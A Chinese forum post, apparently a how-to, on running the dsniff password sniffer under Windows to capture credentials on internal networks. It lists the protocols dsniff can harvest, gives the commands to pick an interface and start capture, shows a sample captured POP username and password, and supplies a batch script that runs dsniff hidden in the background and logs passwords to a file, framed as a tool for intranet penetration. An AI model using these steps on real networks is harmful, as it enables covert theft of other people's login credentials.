关于网络环境下的口令嗅探器

看看别人是怎么评价的吧：

最近两年，网络监听(sniffer)技术出现了新的重要特征。传统的sniffer技术是被动地监听网络通信、用户名和口令。而新的sniffer技术出现了主动地控制通信数据的特点，把sniffer技术扩展到了一个新的领域。Dug Song写的Dsniff的工具是第一批扩展了传统的sniffer概念的监听工具。Dsniff制造数据包注入到网络，并将通信数据重定向到攻击者的机器。在这种方式下，Dsniff允许攻击者在交换环境的网络内窃听数据，甚至在攻击者和攻击目标不在同一个Lan(局域网)的情况下，也能使攻击者收集到他想要的数据 

介绍

这是一个口令嗅探器，可以处理的协议类型包括： 
FTP，Telnet，SMTP，HTTP，POP，NNTP，IMAP，SNMP，LDAP，Rlogin，RIP，OSP 
F，PPTP，MS-CHAP，NFS，VRRP，YP/NIS，SOCKS，X11，CVS，IRC，AIM，ICQ，Napster，ostgreSQL，Meeting Maker，Citrix ICA，Symantec，pcAnywhere，NA 
I Sniffer，Microsoft SMB，Oracle QL*Net，Sybase及Microsoft SQL认证信息 


国内就是和国外没办法比较啊。简单的dsniff.exe的使用方法都没人给出。全tmd是给下载地址和unix下的使用安全（md,那些猪都会）

我把查阅并测试的资料发出来，希望大家不要做破坏……国内的牛淫们太不够意思。其实winnt/2000/2003下的渗透有什么难的嘛，就是sniffer在内网的高效率。其实代码也不是很难实现，可咱不会写啊。

C:\>dsniff /?
Usage: dsniff [-n] [-D] [-i interface] [-s snaplen] [-r|-w file]

C:\>dsniff -D   抓网卡 
Interface Device Description 
------------------------------------------- 
1 \Device\NPF_{3CDD0860-2A1E-4355-B3A7-190F21431018} (Realtek RTL8139/810x Fami 
ly Fast Ethernet NIC ) 


C:\>dsniff -n -i 1  开始抓密码

测试下，登陆我的163信箱

C:\>dsniff  -n  -i 1
-----------------
12/06/05 06:31:43 192.168.0.254 -> 202.108.9.194 (pop)
USER murongxiaoyu
PASS  123456  （密码是假的啦）

国外的牛人用一些批处理等配合使用

@echo off 
sm /hidden c:\windows\ds\dsniff.exe -w > password.db 

dsniff -r password.db > panen.txt   输入一个文本里，方便查询

Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP)
wpcap.vxd packet.dll    使用前当然要配合winpcap驱动

[1] [2] 下一页